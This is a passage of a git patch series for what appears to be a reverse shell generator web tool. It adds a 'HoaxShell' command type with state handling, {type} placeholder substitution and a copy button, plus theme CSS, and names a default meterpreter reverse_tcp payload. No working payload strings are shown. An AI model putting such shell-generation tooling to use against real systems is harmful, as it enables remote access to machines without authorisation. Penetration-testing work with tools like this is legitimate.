+    document.querySelector("#hoaxshell-selection").innerHTML = "";
+    rsg.setState({
+        commandType: CommandType.HoaxShell,
+		encoding: "None"
+    });
+});
+
 var rawLinkButtons = document.querySelectorAll('.raw-listener');
 for (const button of rawLinkButtons) {
     button.addEventListener("click", () => {
@@ -93,6 +103,7 @@ const rsg = {
     ip: query.get('ip') || localStorage.getItem('ip') || '10.10.10.10',
     port: query.get('port') || localStorage.getItem('port') || 9001,
     payload: query.get('payload') || localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
+    payload: query.get('type') || localStorage.getItem('type') || 'cmd-curl',
     shell: query.get('shell') || localStorage.getItem('shell') || rsgData.shells[0],
     listener: query.get('listener') || localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
     encoding: query.get('encoding') || localStorage.getItem('encoding') || 'None',
@@ -100,6 +111,7 @@ const rsg = {
         [CommandType.ReverseShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.ReverseShell })[0].name,
         [CommandType.BindShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.BindShell })[0].name,
         [CommandType.MSFVenom]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.MSFVenom })[0].name,
+        [CommandType.HoaxShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.HoaxShell })[0].name,
     },
     commandType: CommandType.ReverseShell,
     filter: FilterType.All,
@@ -116,6 +128,10 @@ const rsg = {
         [CommandType.MSFVenom]: {
             listSelection: '#msfvenom-selection',
             command: '#msfvenom-command'
+        },
+        [CommandType.HoaxShell]: {
+            listSelection: '#hoaxshell-selection',
+            command: '#hoaxshell-command'
         }
     },
 
@@ -169,6 +185,16 @@ const rsg = {
 
     },
 
+    getType: () => {
+        if (rsg.commandType === 'HoaxShell') {
+            let cmd_name = rsg.getSelectedCommandName();
+            return hoaxshell_listener_types[cmd_name];
+        }
+
+        return 'cmd-curl'
+
+    },
+
     generateReverseShellCommand: () => {
         let command
 
@@ -358,6 +384,7 @@ const rsg = {
         command = command.replace('{port}', rsg.getPort())
         command = command.replace('{ip}', rsg.getIP())
         command = command.replace('{payload}', rsg.getPayload())
+        command = command.replace('{type}', rsg.getType())
 
         if (rsg.getPort() < 1024) {
             privilegeWarning.style.visibility = "visible";
@@ -456,6 +483,10 @@ document.querySelector('#copy-msfvenom-command').addEventListener('click', () =>
     rsg.copyToClipboard(msfVenomCommand.innerText)
 })
 
+document.querySelector('#copy-hoaxshell-command').addEventListener('click', () => {
+    rsg.copyToClipboard(hoaxShellCommand.innerText)
+})
+
 var downloadButton = document.querySelectorAll(".download-svg");
 for (const Dbutton of downloadButton) {
     Dbutton.addEventListener("click", () => {

From 4658cb578b86b964bbfc518e0ccbb88e1a6b603c Mon Sep 17 00:00:00 2001
From: Panagiotis Chartas 
Date: Thu, 16 Feb 2023 17:59:08 +0100
Subject: [PATCH 6/8] Added Hoaxshell

---
 css/light-mode.css | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/css/light-mode.css b/css/light-mode.css
index e848302..cd3d619 100644
--- a/css/light-mode.css
+++ b/css/light-mode.css
@@ -103,6 +103,15 @@ Ain't got time for using CSS the right way. !important everything!
     max-height: 20rem;
 }
 
+[data-theme="light"] #hoaxshell-command {
+    border: none !important;
+    border-radius: 5px;
+    box-shadow: 10px 10px 20px 0px rgba(209, 209, 209, 0.75);
+    background-color: rgb(45, 139, 135);
+    color: #000;
+    max-height: 20rem;
+}
+
 [data-theme="light"] .custom-select {
     background-color: #f2f2f2;
     color: #000;

From 2b454e51567ec4325a328a6c6375678e301d65aa Mon Sep 17 00:00:00 2001
From: Panagiotis Chartas 
Date: Thu, 16 Feb 2023 18:02:45 +0100
Subject: [PATCH 7/8] Added HoaxShell

---
 css/dark-mode.css | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/css/dark-mode.css b/css/dark-mode.css
index 8773912..bd715c5 100644
--- a/css/dark-mode.css
+++ b/css/dark-mode.css
@@ -69,6 +69,14 @@ _:-ms-fullscreen, :root body {
     max-height: 20rem;
 }
 
+#hoaxshell-command {
+    border: none !important;
+    border-radius: 5px;
+    box-shadow: 10px 10px 20px 0px rgba(0, 0, 0, 0.75);
+    background-color: rgb(70, 70, 70);
+    max-height: 20rem;
+}
+
 #theme-selector {
     width: 100px;
     height: 30px;
@@ -136,4 +144,4 @@ h2 {
     .github-corner .octo-arm {
         animation: octocat-wave 560ms ease-in-out
     }
-}
\ No newline at end of file
+}

From 8b8f6b9de2a45508a9613d668bb62e815b81d384 Mon Sep 17 00:00:00 2001
From: Panagiotis Chartas 
Date: Thu, 16 Feb 2023 18:04:50 +0100
Subject: [PATCH 8/8] Added HoaxShell

---
 css/meme-mode.css | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/css/meme-mode.css b/css/meme-mode.css
index 205ec60..4a1a796 100644
--- a/css/meme-mode.css
+++ b/css/meme-mode.css
@@ -108,6 +108,15 @@ Ain't got time for using CSS the right way. !important everything!
     max-height: 20rem;
 }
 
+[data-theme="meme"] #hoaxshell-command {
+    border: none !important;
+    border-radius: 5px;
+    box-shadow: 10px 10px 20px 0px rgba(153, 28, 143, 0.75);
+    background-color: rgb(45, 139, 135);
+    color: #000;
+    max-height: 20rem;
+}
+
 [data-theme="meme"] .custom-select {
     background-color: #f1c6ce;
     color: #000;
@@ -330,4 +339,4 @@ Ain't got time for using CSS the right way. !important everything!
     100% {
         color: orange;
     }
-}
\ No newline at end of file
+}